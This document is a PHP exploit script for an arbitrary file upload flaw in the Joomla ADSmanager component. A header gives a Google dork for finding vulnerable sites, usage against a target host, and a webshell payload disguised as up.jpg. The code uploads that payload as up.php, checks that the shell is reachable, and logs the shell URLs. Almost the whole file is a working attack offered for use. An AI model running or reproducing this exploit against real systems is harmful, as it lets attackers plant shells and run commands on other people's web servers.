<?php

/*
  # AUTOR DISCOVERY: Back-DOOR - https://fb.com/Backdoor.ma
  # REF:         https://ghostbin.com/paste/metta ,   https://www.youtube.com/watch?v=4PqqBhD6ov4
  # Exploit Title: Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability
  # TIPE:          Arbitrary File Upload
  # Google DORK:   inurl:/index.php?option=com_adsmanager"
  # EXPLOIT:       /index.php?option=com_adsmanager&task=upload&tmpl=component
  # Tested on:     Linux
  # EXECUTE:       php exploit.php www.alvo.com.br
  # EXECUTE:       php exploit.php www.alvo.com.br/pasta
  # OUTPUT:        Exploit_AFU_Joomla.txt
  # FILE UPLOAD:   up.jpg => code shell: <?php system('id'); ?>
  --------------------------------------------------------------------------------

  # AUTOR SCRIPT: Cleiton Pinheiro / Nick: googleINURL
  # EMAIL:        inurlbr@gmail.com
  # Blog:         http://blog.inurl.com.br
  # Twitter:      https://twitter.com/googleinurl
  # Fanpage:      https://fb.com/InurlBrasil
  # Pastebin      http://pastebin.com/u/Googleinurl
  # GIT:          https://github.com/googleinurl
  # PSS:          http://packetstormsecurity.com/user/googleinurl
  # EXA:          http://exploit4arab.net/author/248/Cleiton_Pinheiro
  # YOUTUBE:      http://youtube.com/c/INURLBrasil
  # PLUS:         http://google.com/+INURLBrasil
 */

error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();

function __plus() {

    ob_flush();
    flush();
}

function __request($params) {
    $objcurl = curl_init();
    curl_setopt($objcurl, CURLOPT_URL, "{$params['host']}/index.php?option=com_adsmanager&task=upload&tmpl=component");
    curl_setopt($objcurl, CURLOPT_POST, 1);
    curl_setopt($objcurl, CURLOPT_HEADER, 1);
    curl_setopt($objcurl, CURLOPT_REFERER, $params['host']);
    curl_setopt($objcurl, CURLOPT_POSTFIELDS, array("file" => "@up.jpg", "name" => "up.php"));
    curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($objcurl, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($objcurl, CURLOPT_FOLLOWLOCATION, 1);
    $info['corpo'] = curl_exec($objcurl);
    $info['server'] = curl_getinfo($objcurl);
    curl_close($objcurl);
    $gh = get_headers($params['cmd'], 1);
    foreach ($gh as $key => $value) {
        echo " [INFO][{$key}]:: {$value}\n";
    }
    $_x = (strstr(($gh[0] . (isset($gh[1]) ? $gh[1] : NULL)), '200'));
    echo "--------------------------------------------------------------\n";
    print " [INFO][COD]:: " . (!empty($_x) ? '[+] VULL' : "[-] NOT VULL\n");
    if (strstr($info['corpo'], '"tmpfile" : "up.php"')) {
        print "\n [INFO][URL][SHELL]:: " . (!empty($_x) ? "[+] {$params['cmd']}" . file_put_contents("Exploit_AFU_Joomla.txt", "{$params['cmd']}\n\n", FILE_APPEND) : '[-] ERROR!');
        print "\n [INFO] Successfully Upload!\n";
    }
    echo "--------------------------------------------------------------\n";
}

echo "\n [+]   Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability\n\n";
$params = array('cmd' => "{$argv[1]}/tmp/plupload/up.php", 'host' => isset($argv[1]) ? (strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}") : exit("\n0x[ERRO] DEFINE TARGET!\n"));
__request($params) . __plus();